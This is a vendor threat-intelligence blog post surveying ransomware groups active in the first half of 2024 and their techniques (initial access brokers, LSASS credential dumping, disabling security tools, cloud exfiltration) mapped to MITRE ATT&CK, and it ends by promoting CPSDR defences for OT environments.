By understanding the methods and strategies of ransomware groups, companies can better fortify their defenses.
Since 2015, ransomware attacks have become a significant threat that organizations and enterprises cannot afford to ignore, especially as critical infrastructure sectors (CI) increasingly embrace digitalization. Due to IT and OT convergence, even OT environments have become targets for ransomware groups. In 2023, ransomware attacks were the most frequent incidents faced by OT environments, followed by issues related to lack of security updates and APT attacks.[1] As ransomware groups continue to evolve, they’ve also recently taken to developing triple and quadruple extortion tactics for their attack strategies.
In response to these escalating threats, the threat team at TXOne Networks has conducted an extensive investigation into the current ransomware landscape, employing open-source intelligence and ransom blogs commonly utilized by ransomware groups as key sources of insight. [2] [3] [4] [5] [6] This investigation has culminated in the compilation of a list identifying the most active ransomware groups in the first half of 2024. By understanding the methods and strategies of these ransomware groups, industries can use this analysis to better fortify their defenses and mitigate the risks associated with the digital transformation of essential services.
Figure 1 shows the ransomware groups that have been active for the first half of 2024, according to the statistics reported by ransomware groups’ ransom blogs. Many well-known groups have retained their high rankings. However, to maximize financial gains, ransomware groups are continually evolving their tactics. Research into the attack strategies and techniques employed by active groups such as LockBit, Play, Black Basta, 8base, and Akira over the past year has revealed the following trends:
Fig. 1: Ransomware attacks in the first half of 2024, categorized by group. Note: These statistics are based on claims made by the ransomware groups themselves, which may not always align perfectly with real incidents.
Initial Access Brokers (IABs) are threat actors who specialize in infiltrating organizational computer systems and networks. Rather than carrying out attacks themselves, IABs profit by selling unauthorized access to other malicious actors. The pricing for these different types of access is determined based on the size of the target and the category of access being sold.
Recent cases have shown that ransomware groups frequently obtain victim credentials through IABs, which can include access to cloud or VPN service accounts. Unfortunately, these technologies have already been adopted in the modern CI sectors:
Ransomware groups often acquire computers already compromised by initial access brokers, which are pre-equipped with legitimate remote services that can be exploited to facilitate lateral movement attacks. Once they obtain local administrator privileges on a compromised computer, they often use techniques such as LSASS dump or domain cached credential dump to steal valid accounts and connect directly to other devices through services like RDP or SMB, enabling the spread of ransomware throughout an organization’s network.
As mentioned earlier, ransomware groups are escalating the pressure on victims by not only encrypting files but also stealing data so that they can use triple extortion tactics. They may threaten to leak data, harass customers, and threaten upstream and downstream suppliers. Sometimes, tools like Rclone and MEGA are used to steal the data of victim organizations. Worryingly, legitimate cloud storage solutions like Rclone and MEGA are often used to steal the data of a victim organization, making it difficult to detect their activities.
The threat research team has compiled a summary of the recent attack techniques employed by active ransomware groups in the first half of 2024, as detailed in Table 1. This summary includes data on LockBit, Play, Black Basta, 8base, and Akira. Each number in the box indicates the frequency with which these techniques were employed by ransomware groups. Techniques commonly adopted by ransomware groups are highlighted in orange. The findings reveal that ransomware attacks are predominantly driven by financial gain. These attacks typically utilize widespread and well-known strategies to maximize their impact and profitability. With the growing trend of mutual learning, these groups are increasingly using common tactics, learning from each other as they share knowledge and techniques. Below, we elaborate on several observed techniques:
Table 1: Techniques Used by Active Ransomware Groups in MITRE ATT&CK v15.1
As previously mentioned, ransomware groups use Initial Access Brokers to obtain access permissions to organizational networks. Consequently, during the Initial Access phase, ransomware groups often already possess valid accounts for remote services on compromised computers. Upon entering a victim’s computer during the Execution phase, the Command and Scripting Interpreter sub-technique is where these groups commonly utilize system-native tools such as PowerShell and Windows Command Shell to reduce the likelihood of detection by security personnel.
Furthermore, in the Defense Evasion phase, different ransomware groups employ a diverse toolbox of techniques. Among the most common are sub-techniques specifically used to Disable or Modify System Firewall and Disable or Modify Tools. Ransomware groups employ these to disable or alter antivirus software and security tools on compromised devices. This not only bypasses network restrictions but also reduces the likelihood of their malicious activities being detected.
Once attackers gain local administrator privileges on a victim’s computer, they will use OS Credential Dump techniques to extract valid accounts from other devices. They then login using familiar services such as RDP or SMB. Within OS Credential Dumping, nearly every ransomware group attempts to access LSASS Memory. This technique works as follows: once a user logs into a computer, the system generates various credential data and stores it in LSASS Memory. These credentials can then be accessed by attackers and used to move laterally within the network.
Lastly, to reap the benefits of extortion that goes beyond double extortion, ransomware groups proceed to steal internal data from victim organizations. They employ techniques like Archive Collected Data to obfuscate collected information and minimize the volume of data sent over the network, making it less likely for defenses to detect their actions.
Since ransomware groups are adopting widespread attack strategies, even critical infrastructure (CI) sectors have found themselves in the crosshairs. This is particularly alarming because these are the sectors that can impact national security or society at large. Several CI-related incidents in the first half of 2024 include:
These incidents highlight the danger ransomware groups pose to CI sectors. As various ransomware variants developed by different ransomware groups continue to proliferate, defense measures have struggled to effectively mitigate threats using singular detection methods alone. This challenge is notable in CI sectors due to the nature of technological limitations in their environment, making it more difficult to fend off ransomware attacks.
In response to these challenges, it is important for us to implement comprehensive detection and protection mechanisms tailored to different environments. Fortunately, modern ransomware groups’ attack strategies are becoming clearer. OT environments, which often have minimal operational changes during runtime, are particularly able to benefit from leveraging Cyber-Physical System Detection and Response (CPSDR) technologies to prevent all unexpected system changes before they impact operations. Through CPSDR, even new ransomware variants can be preemptively mitigated. This proactive approach ensures that we are not waiting for a threat to be identified and analyzed before we are able to take action, enabling us to stay ahead of the spread of ransomware attacks effectively.
As self-reported by ransomware groups, the cumulative victims of the first half of 2024 included organizations targeted by highly active organizations such LockBit, Play, Black Basta, 8base, Medusa and Akira. Their attacks have targeted critical infrastructure (CI) industries, with some of the most impactful incidents affecting the healthcare, critical manufacturing, financial, and transportation sectors. The far-reaching impact of these attacks has even attracted the attention of Congress and the White House.
As noted in TXOne’s ICS/OT Threat Hunting Report, threat actors continue to specialize, and ransomware groups acquire access to organizational or enterprise networks through Initial Access Brokers to enhance their attack efficiency. As ransomware groups learn from each other, their attack strategies become clearer.
To decrease the possibility of detection and recovery by security personnel, ransomware groups employ diverse techniques under the Defense Evasion tactic. Despite this diversity, Disable or Modify System Firewall and Disable or Modify Tools sub-techniques remain indispensable as attack strategies.
As most ransomware attacks are financially motivated, CI sectors that can impact national security or societal wellbeing have become prime targets. This raises the stakes, pressuring victim organizations to pay out so as to avoid disrupting essential services. Moreover, due to the technological limitations commonly found in CI sectors, it’s hard to find a singular countermeasure that can effectively mitigate the various threats. To face known ransomware and unknown variants, we should not wait for a threat to be identified and analyzed before responding. Instead, we should employ a proactive approach, like CPSDR, to protect OT environments from the spread of ransomware.
Leave a Reply